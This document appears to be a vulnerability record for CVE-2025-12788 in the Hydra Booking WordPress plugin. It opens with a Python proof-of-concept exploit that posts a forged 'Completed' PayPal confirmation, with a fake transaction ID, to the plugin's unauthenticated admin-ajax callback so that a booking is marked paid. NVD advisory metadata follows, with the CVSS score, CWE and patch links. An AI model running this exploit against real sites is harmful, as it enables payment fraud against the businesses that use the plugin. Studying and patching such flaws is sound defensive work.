CVE-2025-12788

import requests # CVE-2025-12788 PoC - Hydra Booking Payment Bypass # Target: WordPress site with Hydra Booking plugin < 1.1.28 target_url = "http://target-wordpress-site.com" booking_id = "123" # Replace with actual booking ID # Vulnerable endpoint - PayPal payment confirmation callback endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Attack payload - Fake payment confirmation without actual PayPal transaction payload = { "action": "tfhb_meeting_paypal_payment_confirmation_callback", "booking_id": booking_id, "payment_status": "Completed", # Fake status "transaction_id": "FAKE_TX_12345", # Non-existent transaction "amount": "100.00" } print("[*] Sending payment bypass request...") response = requests.post(endpoint, data=payload) if response.status_code == 200: print("[+] Payment bypass request sent successfully") print(f"[*] Response: {response.text}") else: print(f"[-] Request failed with status: {response.status_code}") # Note: This PoC demonstrates the vulnerability concept. # Actual exploitation requires identifying valid booking IDs and endpoints.

{"cve": {"id": "CVE-2025-12788", "sourceIdentifier": "[email protected]", "published": "2025-11-11T11:15:34.890", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Hydra Booking — Appointment Scheduling & Booking Calendar plugin for WordPress is vulnerable to missing payment verification to unauthenticated payment bypass in all versions up to, and including, 1.1.27. This is due to the plugin accepting client-controlled payment confirmation data in the tfhb_meeting_paypal_payment_confirmation_callback function without server-side verification with PayPal's API. This makes it possible for unauthenticated attackers to bypass payment requirements and confirm bookings as paid without any actual payment transaction occurring."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-602"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3392864/hydra-booking/tags/1.1.28/app/Shortcode/HydraBookingShortcode.php?old=3392467&old_path=hydra-booking%2Ftags%2F1.1.27%2Fapp%2FShortcode%2FHydraBookingShortcode.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b49ce4a2-52ad-4824-86fc-5edd2e33802d?source=cve", "source": "[email protected]"}]}}